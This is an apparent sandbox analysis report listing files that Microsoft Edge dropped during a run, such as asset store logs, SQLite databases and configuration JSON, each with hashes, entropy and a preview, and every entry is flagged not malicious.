                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:IbPMZpVGfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVGfx2mjF
                                                                                                                                                                                                                  MD5:925022556E0FBA06FF6FB27DF4137321
                                                                                                                                                                                                                  SHA1:6D4CCB33B1E290E12278DFCCD18B10807546DB71
                                                                                                                                                                                                                  SHA-256:001133D0BE388ABEFCEC4FE90B91D7F446EEDBC45E73C4EB4469C2155E260C09
                                                                                                                                                                                                                  SHA-512:22359AED104A881F7B32C0F20D81DF1CABA06148D5E83AE21934B138BB6964DAA80B0EC238BE36228754E5365E75C4C7197C7B64B308B511774689788A11E800
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                  Entropy (8bit):5.142479411253435
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQt/q2PN723oH+Tcwt9Eh1tIFUt8OPQtQcFZZmw+OPQhvzkwON723oH+Tcwt9Er:7ot/vVaYeb9Eh16FUt8OotJFZ/+Ooh7W
                                                                                                                                                                                                                  MD5:D1EC57FDF29710F5A7D46D236069C981
                                                                                                                                                                                                                  SHA1:7FE9C574082EBDEF7FEF32EECD5DBA4D2ACAAF58
                                                                                                                                                                                                                  SHA-256:A1172434F0B35DDCCA0A263DF1386C062B42BA46FBB754DCC26F4DAA7186DEBD
                                                                                                                                                                                                                  SHA-512:43323AA2BC2E9C2864B265023A4ECC11102856EA2AA1EC7492BADA37EAD83AAB39CEAAEFED7E758ADC8927DC54BD367E70AD8CDE0F68931331D5B274582F0177
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.374 2160 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-15:06:15.375 2160 Recovering log #3.2024/12/18-15:06:15.380 2160 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                  Entropy (8bit):5.142479411253435
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQt/q2PN723oH+Tcwt9Eh1tIFUt8OPQtQcFZZmw+OPQhvzkwON723oH+Tcwt9Er:7ot/vVaYeb9Eh16FUt8OotJFZ/+Ooh7W
                                                                                                                                                                                                                  MD5:D1EC57FDF29710F5A7D46D236069C981
                                                                                                                                                                                                                  SHA1:7FE9C574082EBDEF7FEF32EECD5DBA4D2ACAAF58
                                                                                                                                                                                                                  SHA-256:A1172434F0B35DDCCA0A263DF1386C062B42BA46FBB754DCC26F4DAA7186DEBD
                                                                                                                                                                                                                  SHA-512:43323AA2BC2E9C2864B265023A4ECC11102856EA2AA1EC7492BADA37EAD83AAB39CEAAEFED7E758ADC8927DC54BD367E70AD8CDE0F68931331D5B274582F0177
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.374 2160 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-15:06:15.375 2160 Recovering log #3.2024/12/18-15:06:15.380 2160 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                  Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                  MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                  SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                  SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                  SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                  Entropy (8bit):5.164045846505956
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQc4q2PN723oH+TcwtnG2tMsIFUt8OPQPJZmw+OPQPDkwON723oH+TcwtnG2tM2:7oLvVaYebn9GFUt8OoB/+Oob5OaYebnB
                                                                                                                                                                                                                  MD5:05603FD52AB671BCA9E3F149F0A6DF8E
                                                                                                                                                                                                                  SHA1:99036961E875271A9EA48DB9E02602F9CBDA9706
                                                                                                                                                                                                                  SHA-256:5D6E2BCB4A16D4B9FBBB6F33A2BC3A99EE2028B8CFB24A950F7196801D6B0ACF
                                                                                                                                                                                                                  SHA-512:D08647C02D2353678C6F669D17EDFF84599E46836C5C7DD9F29FEB86E2A13BF444ACEF8485D89794E9197BD45393ED1865D5A7ADBD04E33EBD15F6E51835E1ED
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.520 1e40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-15:06:08.521 1e40 Recovering log #3.2024/12/18-15:06:08.521 1e40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                  Entropy (8bit):5.164045846505956
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQc4q2PN723oH+TcwtnG2tMsIFUt8OPQPJZmw+OPQPDkwON723oH+TcwtnG2tM2:7oLvVaYebn9GFUt8OoB/+Oob5OaYebnB
                                                                                                                                                                                                                  MD5:05603FD52AB671BCA9E3F149F0A6DF8E
                                                                                                                                                                                                                  SHA1:99036961E875271A9EA48DB9E02602F9CBDA9706
                                                                                                                                                                                                                  SHA-256:5D6E2BCB4A16D4B9FBBB6F33A2BC3A99EE2028B8CFB24A950F7196801D6B0ACF
                                                                                                                                                                                                                  SHA-512:D08647C02D2353678C6F669D17EDFF84599E46836C5C7DD9F29FEB86E2A13BF444ACEF8485D89794E9197BD45393ED1865D5A7ADBD04E33EBD15F6E51835E1ED
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.520 1e40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-15:06:08.521 1e40 Recovering log #3.2024/12/18-15:06:08.521 1e40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                  Entropy (8bit):0.6131735641304505
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jfVKyDp4VKrmL:TO8D4jJ/6Up+jX2H
                                                                                                                                                                                                                  MD5:184E3F276A0B6105776C0A35265F0D12
                                                                                                                                                                                                                  SHA1:51B978454F70CB15A4E9D7E75BD639E3827BD778
                                                                                                                                                                                                                  SHA-256:4272902EAA56E9842B301FADD5EA47DD557E0E30C8BFB2EDFE7FFE5D3683DDF4
                                                                                                                                                                                                                  SHA-512:849199725B70BE7C5D8ED324D19D2DB5E5331CBBA13A019E83D7A1E36B46C8D2AE18936B69C4A8A7775C33F70B0080BCFA1BECC382709F875B468155537F990F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                  Entropy (8bit):5.354136752132561
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:SA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:SFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                  MD5:01A5A341D0E7C22F3369653C0199A923
                                                                                                                                                                                                                  SHA1:F731ABBB1B7EF0B5C41AC161FE5C59D95BCB6661
                                                                                                                                                                                                                  SHA-256:EA6038BCBF52CC6E9DFF94B8CF9756B0D570F80258BBF3B6533D0EB60E5F3BD4
                                                                                                                                                                                                                  SHA-512:CE9883BA5F183B78675E090FA0ED335064B88D33F10C2CD3EDAA8CF2844DEC58A5D33ACDBE08C531F7985A4EFF1D5B95714F405A724F44660D8D374C4645253D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.11@.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379025979565098..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):315
                                                                                                                                                                                                                  Entropy (8bit):5.150942177918384
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQjt1N723oH+Tcwtk2WwnvB2KLlpPQoIVjyq2PN723oH+Tcwtk2WwnvIFUv:7opaYebkxwnvFLTooIVOvVaYebkxwnQg
                                                                                                                                                                                                                  MD5:F436344FDAF9F965D56C5CAEB0A97453
                                                                                                                                                                                                                  SHA1:D51929004872160C06E4E2BCBF9C5B7001619F6F
                                                                                                                                                                                                                  SHA-256:1248631F2E11D965738BD86592DF1E77FD743056D99B8740482B91DD9E71D4F9
                                                                                                                                                                                                                  SHA-512:62B913CA1D434B2867CC9D4C739E851969E4454613F7F26DE7412F5FAF301A7D7FA5D202241FAFCBB6E0BAA88F3CEC32E79EC766DC4944F46011D9CA7870C501
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.398 2150 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/18-15:06:16.108 2150 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                  Entropy (8bit):5.324615188227307
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RE:C1gAg1zfv8
                                                                                                                                                                                                                  MD5:005ED1E5E4893BB2B3C59A24CD446B73
                                                                                                                                                                                                                  SHA1:2BA9B4BE128E1BA40DD20371744321BD4397DD53
                                                                                                                                                                                                                  SHA-256:E4D10756E2ED22A866C02683022A102928445F7F74EE40EA6F92E7102601E837
                                                                                                                                                                                                                  SHA-512:16F7E6B3C65F34955DF9B9F478ECFCBD7080FD2F751189EADB83423F3B8DBB3D18C8ED6B9885A11892F943F94B4C537C5D1FD93940B74020CAB73E47B42EE843
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.179765000180042
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQpUN+q2PN723oH+Tcwt8aPrqIFUt8OPQJ5Zmw+OPQJtVkwON723oH+Tcwt8amd:7opNvVaYebL3FUt8OoT/+OoJ5OaYebQJ
                                                                                                                                                                                                                  MD5:47BDDDA33785A578E1B4157018AD71D0
                                                                                                                                                                                                                  SHA1:157E7E1B78DD2DFFD3DF43C76B0F08FF242E2FBA
                                                                                                                                                                                                                  SHA-256:D238CACD4FDE92DAB7E58749AAB8E89BC92903B5D3FE44145349E9458A98CC63
                                                                                                                                                                                                                  SHA-512:31EE8C740A5A73C130AAD45AC0B4FF4C7E1019DF793AE55376BABF936EA290DAAA6EA493E782D6C3DA71954F396B0313B035EFFEF41FA49F2590AC6870355B43
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.413 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-15:06:08.519 1e78 Recovering log #3.2024/12/18-15:06:08.519 1e78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.179765000180042
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQpUN+q2PN723oH+Tcwt8aPrqIFUt8OPQJ5Zmw+OPQJtVkwON723oH+Tcwt8amd:7opNvVaYebL3FUt8OoT/+OoJ5OaYebQJ
                                                                                                                                                                                                                  MD5:47BDDDA33785A578E1B4157018AD71D0
                                                                                                                                                                                                                  SHA1:157E7E1B78DD2DFFD3DF43C76B0F08FF242E2FBA
                                                                                                                                                                                                                  SHA-256:D238CACD4FDE92DAB7E58749AAB8E89BC92903B5D3FE44145349E9458A98CC63
                                                                                                                                                                                                                  SHA-512:31EE8C740A5A73C130AAD45AC0B4FF4C7E1019DF793AE55376BABF936EA290DAAA6EA493E782D6C3DA71954F396B0313B035EFFEF41FA49F2590AC6870355B43
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.413 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-15:06:08.519 1e78 Recovering log #3.2024/12/18-15:06:08.519 1e78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
